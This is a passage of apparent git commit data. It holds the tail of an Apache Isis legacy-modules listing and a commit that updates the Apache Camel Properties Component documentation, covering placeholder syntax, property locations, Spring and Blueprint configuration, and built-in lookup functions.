.[#707070].> 5 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 7 : \"\"\n@enduml\n----\n.Projects\/Modules (Legacy)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Legacy\n[source,yaml]\n----\nGroup: org.apache.isis.legacy\nArtifact: isis-legacy\nType: pom\nDirectory: \/legacy\n----\n|Collection of 
deprecated Apache Isis functionality, for removal.\n\n.Dependencies\n****\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Legacy - Applib\n[source,yaml]\n----\nGroup: org.apache.isis.legacy\nArtifact: isis-legacy-applib\nType: jar\nDirectory: \/legacy\/extensions\/core\/applib\n----\n|To ease migration from Apache Isis versions 1.16+ to 2.0.0.\n\n.Components\n****\no.a.i.legacy.applib.DomainObjectContainer +\n****\n\n.Dependencies\n****\ncom.google.guava:guava:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n\n|Apache Isis Legacy - Commons\n[source,yaml]\n----\nGroup: org.apache.isis.legacy\nArtifact: isis-legacy-commons\nType: jar\nDirectory: \/legacy\/extensions\/core\/commons\n----\n|To ease migration from Apache Isis versions 1.16+ to 2.0.0.\n\n.Dependencies\n****\ncom.google.guava:guava:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n\n|Apache Isis Legacy - Metamodel\n[source,yaml]\n----\nGroup: org.apache.isis.legacy\nArtifact: isis-legacy-metamodel\nType: jar\nDirectory: \/legacy\/extensions\/core\/metamodel\n----\n|To ease migration from Apache Isis versions 1.16+ to 2.0.0.\n\n.Dependencies\n****\ncom.google.guava:guava:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.legacy:isis-legacy-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n\n|Apache Isis Legacy - REST Client\n[source,yaml]\n----\nGroup: org.apache.isis.legacy\nArtifact: isis-legacy-restclient\nType: jar\nDirectory: \/legacy\/mappings\/restclient\n----\n|As defined in Isis v1.x RO Applib.\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Legacy - Runtime\n[source,yaml]\n----\nGroup: org.apache.isis.legacy\nArtifact: isis-legacy-runtime\nType: jar\nDirectory: \/legacy\/extensions\/core\/runtime\n----\n|To ease migration from Apache Isis versions 1.16+ to 2.0.0.\n\n.Dependencies\n****\ncom.google.guava:guava:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.legacy:isis-legacy-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-datanucleus:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n|===\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"753693663527721d09d7c703635755e7cbe90d18","subject":"Document Update","message":"Document Update\n\nThese changes 
are not present in javadoc file. I have reverted the changes as per the comments and also I have removed the changes which are done in the Javadoc file.\r\nhttps:\/\/github.com\/apache\/camel\/blob\/master\/core\/camel-base\/src\/main\/java\/org\/apache\/camel\/component\/properties\/PropertiesComponent.java","repos":"alvinkwekel\/camel,adessaigne\/camel,cunningt\/camel,alvinkwekel\/camel,mcollovati\/camel,pax95\/camel,nikhilvibhav\/camel,adessaigne\/camel,pax95\/camel,gnodet\/camel,tadayosi\/camel,tadayosi\/camel,cunningt\/camel,adessaigne\/camel,cunningt\/camel,pax95\/camel,gnodet\/camel,christophd\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,cunningt\/camel,apache\/camel,apache\/camel,tadayosi\/camel,alvinkwekel\/camel,tdiesler\/camel,christophd\/camel,tdiesler\/camel,alvinkwekel\/camel,adessaigne\/camel,christophd\/camel,mcollovati\/camel,nikhilvibhav\/camel,christophd\/camel,nikhilvibhav\/camel,gnodet\/camel,tadayosi\/camel,nicolaferraro\/camel,apache\/camel,tadayosi\/camel,pmoerenhout\/camel,pmoerenhout\/camel,nicolaferraro\/camel,mcollovati\/camel,mcollovati\/camel,pmoerenhout\/camel,tdiesler\/camel,tdiesler\/camel,pmoerenhout\/camel,tadayosi\/camel,christophd\/camel,pax95\/camel,pax95\/camel,adessaigne\/camel,apache\/camel,cunningt\/camel,gnodet\/camel,cunningt\/camel,nicolaferraro\/camel,christophd\/camel,apache\/camel,gnodet\/camel,tdiesler\/camel,pmoerenhout\/camel,apache\/camel,pmoerenhout\/camel,adessaigne\/camel,tdiesler\/camel,pax95\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/properties-component.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/properties-component.adoc","new_contents":"[[properties-component]]\n= Properties Component\n\/\/THIS FILE IS COPIED: EDIT THE SOURCE FILE:\n:page-source: core\/camel-base\/src\/main\/docs\/properties-component.adoc\n\/\/Written by hand, not generated.\n:docTitle: Properties\n:artifactId: camel-base\n:description: The properties component is used for property placeholders in your Camel application, such as endpoint URIs.\n:since: 2.3\n:supportLevel: Stable\n\n*Since Camel {since}*\n\nThe properties component is used for property placeholders in your Camel application, such as endpoint URIs.\nIt is *not* a regular Camel component with producer and consumer for routing messages. However for historical\nreasons it was named `PropertiesComponent` and this name is commonly known and therefore we keep using it.\n\n== Spring Boot Auto-Configuration\n\nThe component supports 10 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.properties.auto-discover-properties-sources* | Whether to automatically discovery instances of PropertiesSource from registry and service factory. | true | Boolean\n| *camel.component.properties.default-fallback-enabled* | If false, the component does not attempt to find a default for the key by looking after the colon separator. | true | Boolean\n| *camel.component.properties.encoding* | Encoding to use when loading properties file from the file system or classpath. If no encoding has been set, then the properties files is loaded using ISO-8859-1 encoding (latin-1) as documented by java.util.Properties#load(java.io.InputStream) | | String\n| *camel.component.properties.environment-variable-mode* | Sets the OS environment variables mode (0 = never, 1 = fallback, 2 = override). 
The default mode (override) is to use OS environment variables if present, and override any existing properties. OS environment variable mode is checked before JVM system property mode | 2 | Integer\n| *camel.component.properties.ignore-missing-location* | Whether to silently ignore if a location cannot be located, such as a properties file not found. | false | Boolean\n| *camel.component.properties.initial-properties* | Sets initial properties which will be used before any locations are resolved. The option is a java.util.Properties type. | | String\n| *camel.component.properties.location* | A list of locations to load properties. You can use comma to separate multiple locations. This option will override any default locations and only use the locations from this option. | | String\n| *camel.component.properties.override-properties* | Sets a special list of override properties that take precedence and will be used first, if a property exists. The option is a java.util.Properties type. | | String\n| *camel.component.properties.properties-parser* | To use a custom PropertiesParser. The option is a org.apache.camel.component.properties.PropertiesParser type. | | String\n| *camel.component.properties.system-properties-mode* | Sets the JVM system property mode (0 = never, 1 = fallback, 2 = override). The default mode (override) is to use system properties if present, and override any existing properties. OS environment variable mode is checked before JVM system property mode | 2 | Integer\n|===\n\n[TIP]\n**Resolving property from Java code** +\nYou can use the method `resolvePropertyPlaceholders` on the\n`CamelContext` to resolve a property from any Java code.\n\n== Using PropertyPlaceholder\n\nCamel now provides a new `PropertiesComponent` in *camel-core* which\nallows you to use property placeholders when defining Camel\nEndpoint URIs.\n\nThis works much like you would do if using Spring's\n`<property-placeholder>` tag. However, Spring has a limitation which\nprevents 3rd party frameworks from leveraging Spring property placeholders\nto the fullest. See more at\nxref:manual:faq:how-do-i-use-spring-property-placeholder-with-camel-xml.adoc[How do\nI use Spring Property Placeholder with Camel XML].\n\n[TIP]\n**Bridging Spring and Camel property placeholders** +\nYou can bridge the Spring property placeholder\nwith Camel; see further below for more details.\n\nThe property placeholder is generally in use when doing:\n\n* lookup or creation of endpoints\n* lookup of beans in the Registry\n* additional support in Spring XML (see below in examples)\n* using Blueprint PropertyPlaceholder with Camel\nxref:properties-component.adoc[Properties] component\n* using `@PropertyInject` to inject a property in a POJO\n* using a default value if a property does not exist\n* using out of the box functions to look up property\nvalues from OS environment variables, JVM system properties, or the\nservice idiom\n* using custom functions, which can be plugged into the\nproperty component\n\n== Syntax\n\nThe syntax to use Camel's property placeholder is to use `{\{key}}`, for\nexample `{{file.uri}}` where `file.uri` is the property key.\n\nYou can use property placeholders in parts of the endpoint URIs; for\nexample, you can use placeholders for parameters in the URIs.\n\nYou can specify a default value to use if\na property with the key does not exist, e.g. `file.url:\/some\/path` where\nthe default value is the text after the colon (e.g. `\/some\/path`).\n\n[NOTE]\n====\nDo not use a colon in the property key. The colon is used as a separator\ntoken when you are providing a default value.\n====\n
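\nFor example, a route can combine a placeholder with a default value directly in an endpoint URI. A minimal sketch (the `file.url` key and the paths are illustrative, not part of the component):\n\n[source,java]\n----\n\/\/ resolves to file:\/some\/path when no file.url property is defined\nfrom(\"file:{{file.url:\/some\/path}}\").to(\"mock:result\");\n----\n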
\n== Defining location\n\nThe properties component needs to know one or more locations where to resolve the\nproperties. You can define 1 to many locations. If you define the\nlocation in a single String property you can separate multiple locations\nwith comma such as:\n\n[source,java]\n----\npc.setLocation(\"com\/mycompany\/myprop.properties,com\/mycompany\/other.properties\");\n----\n\nYou can mark a location as safe to discard if missing by setting the ``optional`` attribute, which is false by default, i.e.:\n\n[source,java]\n----\npc.setLocations(\n \"com\/mycompany\/override.properties;optional=true\",\n \"com\/mycompany\/defaults.properties\");\n----\n\n== Using system and environment variables in locations\n\nThe location now supports using placeholders for JVM system properties\nand OS environment variables.\n\nFor example:\n\n[source]\n----\nlocation=file:${karaf.home}\/etc\/foo.properties\n----\n\nIn the location above we defined a location using the file scheme using\nthe JVM system property with key `karaf.home`.\n\nTo use an OS environment variable instead you would have to prefix with\nenv:\n\n[source]\n----\nlocation=file:${env:APP_HOME}\/etc\/foo.properties\n----\n\nWhere `APP_HOME` is an OS environment variable.\n\n[NOTE]\n====\nSome OSes (such as Linux) do not support dashes in environment variable names,\nso here we are using `APP_HOME`. But if you specify `APP-HOME` then Camel 3 will automatically look up\nthe value as `APP_HOME` (with underscore) as a fallback.\n====\n\nYou can have multiple placeholders in the same location, such as:\n\n[source]\n----\nlocation=file:${env:APP_HOME}\/etc\/${prop.name}.properties\n----\n\n== Configuring in Java DSL\n\nYou can obtain the `PropertiesComponent` (registered under the name\n`properties`) from the `CamelContext` and configure it such as:\n\n[source,java]\n----\nPropertiesComponent pc = camelContext.getPropertiesComponent();\npc.setLocation(\"classpath:com\/mycompany\/myprop.properties\");\n----\n
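\nAs the earlier tip notes, a configured placeholder can then be resolved from plain Java code via `resolvePropertyPlaceholders` on the `CamelContext`. A minimal sketch (the key name is illustrative):\n\n[source,java]\n----\n\/\/ resolve a configured placeholder from Java code\nString endpointUri = camelContext.resolvePropertyPlaceholders(\"{{cool.end}}\");\n----\n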
Or you can use the `<propertyPlaceholder>` tag.\n\n[source,xml]\n----\n<bean id=\"properties\" class=\"org.apache.camel.component.properties.PropertiesComponent\">\n <property name=\"location\" value=\"classpath:com\/mycompany\/myprop.properties\"\/>\n<\/bean>\n----\n\nUsing the `<propertyPlaceholder>` tag makes the configuration a bit more\nfresh such as:\n\n[source,xml]\n----\n<camelContext ...>\n <propertyPlaceholder id=\"properties\" location=\"com\/mycompany\/myprop.properties\"\/>\n<\/camelContext>\n----\n\nSetting the properties location through the location tag works just fine but sometimes you have a number of resources to take into account and starting from *Camel 2.19.0* you can set the properties location with a dedicated propertiesLocation:\n\n[source,xml]\n----\n<camelContext ...>\n <propertyPlaceholder id=\"myPropertyPlaceholder\">\n <propertiesLocation\n resolver = \"classpath\"\n path = \"com\/my\/company\/something\/my-properties-1.properties\"\n optional = \"false\"\/>\n <propertiesLocation\n resolver = \"classpath\"\n path = \"com\/my\/company\/something\/my-properties-2.properties\"\n optional = \"false\"\/>\n <propertiesLocation\n resolver = \"file\"\n path = \"${karaf.home}\/etc\/my-override.properties\"\n optional = \"true\"\/>\n <\/propertyPlaceholder>\n<\/camelContext>\n----\n\n[TIP]\n**Specifying the cache option inside XML** +\nCamel supports specifying a value for the cache option both\ninside the Spring as well as the Blueprint XML.\n\n== Using a Properties from the Registry\n\nFor example in OSGi you may want to expose a service which returns the\nproperties as a `java.util.Properties` object.\n\nThen you could setup the xref:properties-component.adoc[Properties] component as\nfollows:\n\n[source,xml]\n----\n <propertyPlaceholder id=\"properties\" location=\"ref:myProperties\"\/>\n----\n\nWhere `myProperties` is the id to use for lookup in the OSGi registry.\nNotice we use the `ref:` prefix to tell Camel that it should lookup the\nproperties for the Registry.\n\n== Examples using properties component\n\nWhen using property placeholders in the endpoint URIs you can either use\nthe `properties:` component or define the placeholders directly in the\nURI. 
We will show example of both cases, starting with the former.\n\n[source,java]\n----\n\/\/ properties\ncool.end=mock:result\n\n\/\/ route\nfrom(\"direct:start\").to(\"{{cool.end}}\");\n----\n\nYou can also use placeholders as a part of the endpoint uri:\n\n[source,java]\n----\n\/\/ properties\ncool.foo=result\n\n\/\/ route\nfrom(\"direct:start\").to(\"mock:{{cool.foo}}\");\n----\n\nIn the example above the to endpoint will be resolved to `mock:result`.\n\nYou can also have properties with refer to each other such as:\n\n[source,java]\n----\n\/\/ properties\ncool.foo=result\ncool.concat=mock:{{cool.foo}}\n\n\/\/ route\nfrom(\"direct:start\").to(\"mock:{{cool.concat}}\");\n----\n\nNotice how `cool.concat` refer to another property.\n\nAnd you can use placeholders several times:\n\n[source,java]\n----\n\/\/ properties\ncool.start=direct:start\ncool.showid=true\ncool.result=result\n\n\/\/ route\nfrom(\"{{cool.start}}\")\n .to(\"log:{{cool.start}}?showBodyType=false&showExchangeId={{cool.showid}}\")\n .to(\"mock:{{cool.result}}\");\n----\n\nYou can also your property placeholders when using\nProducerTemplate for example:\n\n[source,java]\n----\ntemplate.sendBody(\"{{cool.start}}\", \"Hello World\");\n----\n\n== Example with xref:languages:simple-language.adoc[Simple] language\n\nThe xref:languages:simple-language.adoc[Simple] language now also support using property\nplaceholders, for example in the route below:\n\n[source,java]\n----\n\/\/ properties\ncheese.quote=Camel rocks\n\n\/\/ route\nfrom(\"direct:start\")\n .transform().simple(\"Hi ${body} do you think ${properties:cheese.quote}?\");\n----\n\n== Additional property placeholder supported in Spring XML\n\nThe property placeholders is also supported in many of the Camel Spring\nXML tags such as\n`<package>, <packageScan>, <contextScan>, <jmxAgent>, <endpoint>, <routeBuilder>, <proxy>`\nand the others.\n\nThe example below has property placeholder in the `<jmxAgent>` tag:\n\n[source,xml]\n----\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <propertyPlaceholder id=\"properties\" location=\"org\/apache\/camel\/spring\/jmx.properties\"\/>\n <!-- we can use property placeholders when we define the JMX agent -->\n <jmxAgent id=\"agent\" disabled=\"{{myjmx.disabled}}\"\n usePlatformMBeanServer=\"{{myjmx.usePlatform}}\"\n statisticsLevel=\"RoutesOnly\" useHostIPAddress=\"true\"\/>\n <route id=\"foo\" autoStartup=\"false\">\n <from uri=\"seda:start\"\/>\n <to uri=\"mock:result\"\/>\n <\/route>\n<\/camelContext>\n----\n\nYou can also define property placeholders in the various attributes on\nthe `<camelContext>` tag such as `trace` as shown here:\n\n[source,xml]\n----\n<camelContext trace=\"{{foo.trace}}\" xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <propertyPlaceholder id=\"properties\" location=\"org\/apache\/camel\/spring\/processor\/myprop.properties\"\/>\n <template id=\"camelTemplate\" defaultEndpoint=\"{{foo.cool}}\"\/>\n <route>\n <from uri=\"direct:start\"\/>\n <setHeader name=\"{{foo.header}}\">\n <simple>${in.body} World!<\/simple>\n <\/setHeader>\n <to uri=\"mock:result\"\/>\n <\/route>\n<\/camelContext>\n----\n\n== Using JVM system properties or Environment variables as override or fallback values\n\nThe properties components supports using JVM system properties and also OS environment variables\nas values which can either be used as override or fallback values.\n\nThe default mode is that both of them are in override mode, and they are check in the following order:\n\n1. 
OS environment variable (override mode)\n2. JVM system property (override mode)\n3. Property files and other locations\n4. OS environment variable (fallback mode)\n5. JVM system property (fallback mode)\n\nThe check stops at first found property value for the key.\n\nYou can control these modes using the `systemPropertiesMode` and `environmentVariableMode`\noptions on the properties component.\n\n== Using property placeholders for any kind of attribute in the XML DSL\n\nIn the example below we use the `prop` prefix for the namespace\ncamel.apache.org\/schema\/placeholder by which we can use the\n`prop` prefix in the attributes in the XML DSLs. Notice how we use that\nin the Multicast to indicate that the option\n`stopOnException` should be the value of the placeholder with the key\n\"stop\".\n\nIn our properties file we have the value defined as\n\n[source]\n----\nstop=true\n----\n\n== Using Blueprint property placeholder with Camel routes\n\nCamel supports Blueprint\nwhich also offers a property placeholder service. Camel supports\nconvention over configuration, so all you have to do is to define the\nOSGi Blueprint property placeholder in the XML file as shown below:\n\n[source,xml]\n----\n<blueprint xmlns=\"http:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xmlns:cm=\"http:\/\/aries.apache.org\/blueprint\/xmlns\/blueprint-cm\/v1.0.0\"\n xsi:schemaLocation=\"\n http:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0 https:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0\/blueprint.xsd\">\n\n <!-- OSGI blueprint property placeholder -->\n <cm:property-placeholder id=\"myblueprint.placeholder\" persistent-id=\"camel.blueprint\">\n <!-- list some properties as needed -->\n <cm:default-properties>\n <cm:property name=\"result\" value=\"mock:result\"\/>\n <\/cm:default-properties>\n <\/cm:property-placeholder>\n\n <camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <!-- in the route we can use {{ }} placeholders which will lookup in blueprint\n as Camel will auto detect the OSGi blueprint property placeholder and use it -->\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"mock:foo\"\/>\n <to uri=\"{{result}}\"\/>\n <\/route>\n <\/camelContext>\n<\/blueprint>\n----\n\n=== Using OSGi blueprint property placeholders in Camel routes\n\nBy default Camel detects and uses OSGi blueprint property placeholder\nservice. You can disable this by setting the attribute\n`useBlueprintPropertyResolver` to false on the `<camelContext>`\ndefinition.\n\n=== About placeholder syntax\n\nNotice how we can use the Camel syntax for placeholders `{{` and `}}` in the\nCamel route, which will lookup the value from OSGi blueprint.\n\nThe blueprint syntax for placeholders is `${ }`. So outside the\n`<camelContext>` you must use the `${ }` syntax. Whereas inside\n`<camelContext>` you must use `{{` and `}}` syntax.\n\nOSGi blueprint allows you to configure the syntax, so you can actually\nalign those if you want.\n\nYou can also explicit refer to a specific OSGi blueprint property\nplaceholder by its id. 
For that you need to use the Camel's\n`<propertyPlaceholder>` as shown in the example below:\n\n[source,xml]\n----\n<blueprint xmlns=\"http:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xmlns:cm=\"http:\/\/aries.apache.org\/blueprint\/xmlns\/blueprint-cm\/v1.0.0\"\n xsi:schemaLocation=\"\n http:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0 https:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0\/blueprint.xsd\">\n\n <!-- OSGI blueprint property placeholder -->\n <cm:property-placeholder id=\"myblueprint.placeholder\" persistent-id=\"camel.blueprint\">\n <!-- list some properties as needed -->\n <cm:default-properties>\n <cm:property name=\"prefix.result\" value=\"mock:result\"\/>\n <\/cm:default-properties>\n <\/cm:property-placeholder>\n\n <camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <!-- using Camel properties component and refer to the blueprint property placeholder by its id -->\n <propertyPlaceholder id=\"properties\" location=\"blueprint:myblueprint.placeholder\"\/>\n\n <!-- in the route we can use {{ }} placeholders which will lookup in blueprint -->\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"mock:foo\"\/>\n <to uri=\"{{prefix.result}}\"\/>\n <\/route>\n <\/camelContext>\n<\/blueprint>\n----\n\n\n== Explicit referring to a OSGi blueprint placeholder in Camel\n\nNotice how we use the `blueprint` scheme to refer to the OSGi blueprint\nplaceholder by its id. This allows you to mix and match, for example you\ncan also have additional schemes in the location. For example to load a\nfile from the classpath you can do:\n\n[source]\n----\nlocation=\"blueprint:myblueprint.placeholder,classpath:myproperties.properties\"\n----\n\nEach location is separated by comma.\n\n== Overriding Blueprint property placeholders outside CamelContext\n\nWhen using Blueprint property placeholder in the Blueprint XML file, you\ncan declare the properties directly in the XML file as shown below:\n\n[source,xml]\n----\n<!-- blueprint property placeholders -->\n<cm:property-placeholder persistent-id=\"my-placeholders\" update-strategy=\"reload\">\n <cm:default-properties>\n <cm:property name=\"greeting\" value=\"Hello\"\/>\n <cm:property name=\"destination\" value=\"mock:result\"\/>\n <\/cm:default-properties>\n<\/cm:property-placeholder>\n\n<!-- a bean that uses a blueprint property placeholder -->\n<bean id=\"myCoolBean\" class=\"org.apache.camel.test.blueprint.MyCoolBean\">\n <property name=\"say\" value=\"${greeting}\"\/>\n<\/bean>\n\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n\n <route>\n <from uri=\"direct:start\"\/>\n <bean ref=\"myCoolBean\" method=\"saySomething\"\/>\n <to uri=\"{{destination}}\"\/>\n <\/route>\n\n<\/camelContext>\n----\n\nNotice that we have a `<bean>` which refers to one of the properties. And\nin the Camel route we refer to the other using the `{{` and `}}` notation.\n\nNow if you want to override these Blueprint properties from an unit\ntest, you can do this as shown below:\n\n[source,java]\n----\nprotected String useOverridePropertiesWithConfigAdmin(Dictionary props) {\n \/\/ add the properties we want to override\n props.put(\"greeting\", \"Bye\");\n\n \/\/ return the PID of the config-admin we are using in the blueprint xml file\n return \"my-placeholders\";\n}\n----\n\nTo do this we override and implement the\n`useOverridePropertiesWithConfigAdmin` method. We can then put the\nproperties we want to override on the given props parameter. 
And the\nreturn value *must* be the `persistence-id` of the\n`<cm:property-placeholder>` tag, which you define in the blueprint XML\nfile.\n\n== Using .cfg or .properties file for Blueprint property placeholders\n\nWhen using Blueprint property placeholder in the Blueprint XML file, you\ncan declare the properties in a `.properties` or `.cfg` file. If you use\nApache ServieMix \/ Karaf then this container has a convention that it\nloads the properties from a file in the etc directory with the naming\n`etc\/pid.cfg`, where `pid` is the `persistence-id`.\n\nFor example in the blueprint XML file we have the\n`persistence-id=\"stuff\"`, which mean it will load the configuration file\nas `etc\/stuff.cfg`.\n\nNow if you want to unit test this blueprint XML file, then you can\noverride the `loadConfigAdminConfigurationFile` and tell Camel which\nfile to load as shown below:\n\n[source,java]\n----\n@Override\nprotected String[] loadConfigAdminConfigurationFile() {\n \/\/ String[0] = tell Camel the path of the .cfg file to use for OSGi ConfigAdmin in the blueprint XML file\n \/\/ String[1] = tell Camel the persistence-id of the cm:property-placeholder in the blueprint XML file\n return new String[]{\"src\/test\/resources\/etc\/stuff.cfg\", \"stuff\"};\n}\n----\n\nNotice that this method requires to return a `String[]` with 2 values. The\n1st value is the path for the configuration file to load.\nThe 2nd value is the `persistence-id` of the `<cm:property-placeholder>`\ntag.\n\nThe `stuff.cfg` file is just a plain properties file with the property\nplaceholders such as:\n\n[source]\n----\n== this is a comment\ngreeting=Bye\n----\n\n== Using .cfg file and overriding properties for Blueprint property placeholders\n\nYou can do both as well. Here is a complete example. First we have the\nBlueprint XML file:\n\nAnd in the unit test class we do as follows:\n\nAnd the `etc\/stuff.cfg` configuration file contains\n\n[source]\n----\ngreeting=Bye\necho=Yay\ndestination=mock:result\n----\n\n== Bridging Spring and Camel property placeholders\n\nThe Spring Framework does not allow 3rd party frameworks such as Apache\nCamel to seamless hook into the Spring property placeholder mechanism.\nHowever you can easily bridge Spring and Camel by declaring a Spring\nbean with the type\n`org.apache.camel.spring.spi.BridgePropertyPlaceholderConfigurer`, which\nis a Spring\n`org.springframework.beans.factory.config.PropertyPlaceholderConfigurer`\ntype.\n\nTo bridge Spring and Camel you must define a single bean as shown below:\n\n*Bridging Spring and Camel property placeholders*\n\nYou *must not* use the spring <context:property-placeholder> namespace\nat the same time; this is not possible.\n\nAfter declaring this bean, you can define property placeholders using\nboth the Spring style, and the Camel style within the <camelContext> tag\nas shown below:\n\n*Using bridge property placeholders*\n\nNotice how the hello bean is using pure Spring property placeholders\nusing the `${ }` notation. And in the Camel routes we use the Camel\nplaceholder notation with `{{` and `}}`.\n\n== Clashing Spring property placeholders with Camels Simple language\n\nTake notice when using Spring bridging placeholder then the spring `${ }`\nsyntax clashes with the xref:languages:simple-language.adoc[Simple] in Camel, and therefore\ntake care. 
For example:\n\n[source,xml]\n----\n<setHeader name=\"Exchange.FILE_NAME\">\n <simple>{{file.rootdir}}\/${in.header.CamelFileName}<\/simple>\n<\/setHeader>\n----\n\nclashes with Spring property placeholders, and you should use `$simple{ }`\nto indicate using the xref:languages:simple-language.adoc[Simple] language in Camel.\n\n[source,xml]\n----\n<setHeader name=\"Exchange.FILE_NAME\">\n <simple>{{file.rootdir}}\/$simple{in.header.CamelFileName}<\/simple>\n<\/setHeader>\n----\n\nAn alternative is to configure the `PropertyPlaceholderConfigurer` with\n`ignoreUnresolvablePlaceholders` option to `true`.\n\n== Overriding properties from Camel test kit\n\nWhen Testing with Camel and using the\nxref:properties-component.adoc[Properties] component, you may want to be able to\nprovide the properties to be used from directly within the unit test\nsource code. +\nCamel test kits, eg `CamelTestSupport` class offers the following methods\n\n* `useOverridePropertiesWithPropertiesComponent`\n* `ignoreMissingLocationWithPropertiesComponent`\n\nSo for example in your unit test classes, you can override the\n`useOverridePropertiesWithPropertiesComponent` method and return a\n`java.util.Properties` that contains the properties which should be\npreferred to be used.\n\n=== Providing properties from within unit test source\n\nThis can be done from any of the Camel Test kits, such as camel-test,\ncamel-test-spring, and camel-test-blueprint.\n\nThe `ignoreMissingLocationWithPropertiesComponent` can be used to\ninstruct Camel to ignore any locations which was not discoverable, for\nexample if you run the unit test, in an environment that does not have\naccess to the location of the properties.\n\n== Using @PropertyInject\n\nCamel allows to inject property placeholders in POJOs using the\n`@PropertyInject` annotation which can be set on fields and setter\nmethods.\n\nFor example you can use that with `RouteBuilder` classes, such as shown\nbelow:\n\n[source,java]\n----\npublic class MyRouteBuilder extends RouteBuilder {\n\n @PropertyInject(\"hello\")\n private String greeting;\n\n @Override\n public void configure() throws Exception {\n from(\"direct:start\")\n .transform().constant(greeting)\n .to(\"{{result}}\");\n }\n\n}\n----\n\nNotice we have annotated the greeting field with `@PropertyInject` and\ndefine it to use the key `\"hello\"`. 
Camel will then lookup the property\nwith this key and inject its value, converted to a String type.\n\nYou can also use multiple placeholders and text in the key, for example\nwe can do:\n\n[source,java]\n----\n@PropertyInject(\"Hello {{name}} how are you?\")\nprivate String greeting;\n----\n\nThis will lookup the placeholder with they key `\"name\"`.\n\nYou can also add a default value if the key does not exists, such as:\n\n[source,java]\n----\n@PropertyInject(value = \"myTimeout\", defaultValue = \"5000\")\nprivate int timeout;\n----\n\n== Using out of the box functions\n\nThe xref:properties-component.adoc[Properties] component includes the following\nfunctions out of the box\n\n* `env` - A function to lookup the property from OS environment variables\n* `sys` - A function to lookup the property from Java JVM system\nproperties\n* `service` - A function to lookup the property from OS environment\nvariables using the service naming idiom\n* `service.name` - A function to lookup the\nproperty from OS environment variables using the service naming idiom\nreturning the hostname part only\n* `service.port` - A function to lookup the\nproperty from OS environment variables using the service naming idiom\nreturning the port part only\n\nAs you can see these functions is intended to make it easy to lookup\nvalues from the environment. As they are provided out of the box, they\ncan easily be used as shown below:\n\n[source,xml]\n----\n <camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{`{env:SOMENAME}`}\"\/>\n <to uri=\"{`{sys:MyJvmPropertyName}`}\"\/>\n <\/route>\n <\/camelContext>\n----\n\nYou can use default values as well, so if the property does not exists,\nyou can define a default value as shown below, where the default value\nis a `log:foo` and `log:bar` value.\n\n[source,xml]\n----\n <camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{`{env:SOMENAME:log:foo}`}\"\/>\n <to uri=\"{`{sys:MyJvmPropertyName:log:bar}`}\"\/>\n <\/route>\n <\/camelContext>\n----\n\nThe service function is for looking up a service which is defined using\nOS environment variables using the service naming idiom, to refer to a\nservice location using `hostname : port`\n\n* __NAME__**_SERVICE_HOST**\n* __NAME__**_SERVICE_PORT**\n\nin other words the service uses `_SERVICE_HOST` and `_SERVICE_PORT` as\nprefix. 
